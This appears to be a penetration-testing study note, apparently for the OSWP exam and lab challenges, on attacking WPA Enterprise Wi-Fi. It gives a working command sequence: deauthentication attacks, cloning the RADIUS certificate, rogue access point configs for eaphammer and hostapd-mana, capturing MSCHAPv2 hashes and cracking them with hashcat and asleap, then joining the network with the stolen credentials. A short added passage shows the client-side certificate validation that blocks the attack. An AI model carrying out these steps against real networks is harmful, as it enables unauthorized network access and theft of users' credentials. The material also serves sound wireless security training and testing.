# WPA Enterprise (WPA-MGT)

## 1. Finding WPA-MGT networks

You can find these networks on both the 2.4 GHz and 5 GHz bands:

```
# dump 2.4 GHz
sudo airodump-ng wlan0mon

# dump 5 GHz
sudo airodump-ng -b a wlan0mon
```

In the "AUTH" column of airodump-ng, look for "MGT".

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FOENf7A9r1pWf1YeRuH8C%2Fimage.png?alt=media&#x26;token=4f0e01fa-3a89-4cf2-813f-d0b5500b475c" alt=""><figcaption></figcaption></figure>

## 2. Finding the certificate information

To attack WPA Enterprise we build our own rogue AP, and for that we need a certificate carrying the same information as the target's. To obtain that information, we capture a handshake in the same way as in the WPA2 attacks.

Use airodump-ng to capture the handshake:

```
sudo airodump-ng wlan0mon --bssid F0:9F:C2:71:22:15 -c 44 -w wpamgt
```

Do a deauth attack:

```
sudo aireplay-ng -0 5 -c 64:32:A8:07:6C:40 -a F0:9F:C2:71:22:15 wlan0mon
```

If successful, you will see "WPA handshake: X" in the airodump-ng header.

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FVHEITf44awKOghy7yIA9%2Fimage.png?alt=media&#x26;token=c078219e-f23d-49d9-8393-6593ceb272b2" alt=""><figcaption></figcaption></figure>

Open the wpamgt.cap file in Wireshark and set the display filter to `tls.handshake.certificate`:

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FMvf6rDONd3gZGHayfoe0%2Fimage.png?alt=media&#x26;token=46fac59b-8961-47fe-bf67-d7f0532abd42" alt=""><figcaption></figcaption></figure>

Now extract the certificate with:

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FDdE7NR4PA9xYkMsLwpvr%2F943fb932-8769-4761-b423-e99a2281d1c6.png?alt=media&#x26;token=f35611af-e443-401e-b41f-502ba0023d8d" alt=""><figcaption></figcaption></figure>

Save it as "cert.der" and print its details with:

```
openssl x509 -inform der -in cert.der -text
```

The info we need:

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2F8Jpw0qURjnwHoY2NFUPH%2Fimage.png?alt=media&#x26;token=c2cf1302-2420-4717-8785-915d5f4d4835" alt=""><figcaption></figcaption></figure>

## 3. Setting up Rogue AP

To attack a client that does not properly validate the server certificate on an MGT network, we create a rogue AP with the same ESSID and configuration but with a self-signed certificate, preferably carrying the same data as the real one in case the user manually inspects the certificate. To do this you can use "eaphammer".

{% hint style="danger" %}
eaphammer is **not** allowed on the OSWP exam, instead use **freeradius** with hostapd-mana.
{% endhint %}

```
python3 ./eaphammer --cert-wizard
```

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2Fz6jwEY9Ns2slqwubJDnw%2Fimage.png?alt=media&#x26;token=3856dfdc-0580-44cd-835b-3ce3bd08f3f6" alt=""><figcaption></figcaption></figure>

When this is completed, set up hostapd-mana with:

```
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced
```

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2Fz108dLprC2nbfoqjU9bk%2Fimage.png?alt=media&#x26;token=13eaad8a-accd-40df-ad6a-ee3fa11fe7a4" alt=""><figcaption></figcaption></figure>

### 3.1 Using freeradius with hostapd-mana

First of all, install freeradius:

```
sudo apt-get install freeradius
```

Go to `/etc/freeradius/3.0/certs` and open `ca.cnf` and `server.cnf`.

Change the values shown below to match the information obtained from the captured certificate:

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2F2LElyLsUKvDzuHE5kG7H%2Ffbf487d4-e74f-4052-8b99-6812bf1c1387.png?alt=media&#x26;token=b3e3e0a3-856c-46ea-b52d-dda59acbe301" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FizdOrLylwsWYEQcLTo2r%2Fa5b787fc-f280-4c37-b284-ee58c27af701.png?alt=media&#x26;token=9fcc56cf-48e7-49f4-b2cf-a4b20459a6dd" alt=""><figcaption></figcaption></figure>

After that, run the following commands in `/etc/freeradius/3.0/certs` to regenerate the Diffie-Hellman parameters file (`dh`) that `hostapd-mana` needs:

```
rm dh
make
```

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FtdnV5izN0imFd8WM6Q8y%2F6d7916b3-8f96-4b96-b5dc-ae45125e8b6f.png?alt=media&#x26;token=9ede48fe-5638-46dd-93ee-1f62d9b4e3b6" alt=""><figcaption></figcaption></figure>

Next, create a file called `mana.eap_user` with the following content:

```
*	PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]
```

After that, we define the fake access point by creating a file called `network.conf` in any directory:

```
ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211

channel=<channel>
# 'a' for 5 GHz networks, 'g' for 2.4 GHz networks
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

private_key_passwd=whatever

dh_file=/etc/freeradius/3.0/certs/dh


auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP


wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
```

Make sure `eap_user_file` points to the directory where you saved `mana.eap_user`. Then use hostapd-mana to set up the fake AP:

```
sudo hostapd-mana network.conf
```

## 4. Broadcast deauth to all APs

With airodump-ng we identify the MAC addresses of the clients to deauthenticate, and we run the deauthentication attack against both clients in parallel. Since there are two APs serving the network, we have to attack both: a client disconnected from one AP may simply reconnect to the other instead of to our rogue AP.

{% hint style="info" %}
Drop the `-c` option to send the deauth as a broadcast (kicks all clients).\
You need a second interface in monitor mode, and it must be set to the same channel as the target network before performing the deauthentication attack, as follows:
{% endhint %}

```
sudo iwconfig wlan0mon channel 44
```

Next we send a broadcast deauth to both APs while our rogue AP is listening:

```
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan0mon
```

If successful, we receive a NetNTLM (MSCHAPv2 challenge/response) hash in the `mana_credout` file:

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2Fpi6CtlNQ3xGXgRebYqqp%2Fimage.png?alt=media&#x26;token=55e70e46-decc-47b9-8059-c34432ff3bdf" alt=""><figcaption></figcaption></figure>

## 5. Crack the hash

Crack the captured hash with hashcat in NetNTLMv1 mode (`-m 5500`):

```
hashcat -a 0 -m 5500 juan.tr::::673256730e43f7a67c712534e0970f86160487ce60e560bc:009f9888b8c646ec /root/rockyou-top100000.txt --force
```

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FZ2GGxn7idKNTF4wpfL0q%2Fimage.png?alt=media&#x26;token=054ea8dc-c7d9-4eee-8a58-ce1e7c5a70c6" alt=""><figcaption></figcaption></figure>

### 5.1 Use asleap

If you cannot use hashcat, you can use asleap with the challenge (`-C`) and response (`-R`) values to recover the password instead:

```bash
asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst
```

## 6. Connect to network

Create a wpa_supplicant configuration file (`network.conf`) with the recovered credentials:

```
network={
  ssid="NetworkName"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity="Domain\username"
  password="password"
  eap=PEAP
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}
```
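The block above never checks who the RADIUS server is, which is exactly the client-side weakness the rogue AP in section 3 relies on. As an added example (not from the original page), the same network block with server certificate validation enabled; the CA file path and the server name are assumed placeholders to be replaced with the organisation's own values:

```conf
network={
  ssid="NetworkName"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="Domain\username"
  password="password"
  # Assumed placeholder: the CA that issued the real RADIUS server certificate.
  # Pin to this private CA only, not to the whole system trust store.
  ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
  # Assumed placeholder: the name in the real server certificate (CN or dNSName).
  # Must match exactly; a self-signed clone with copied fields fails the chain check.
  domain_match="radius.example.com"
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}
```

With `ca_cert` and `domain_match` set, wpa_supplicant aborts the TLS tunnel before sending the MSCHAPv2 response, so no hash is ever handed to the rogue AP.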

Connect:

```
wpa_supplicant -c network.conf -i <interface>
```

Get IP:

```sh
sudo dhclient wlan3
ip addr show wlan3
```

## 7. Sources

<https://zeyadazima.com/notes/oswplaybook/#attacking-wpa-enterprise>

<https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#18-what-is-juans-wifi-corp-password>
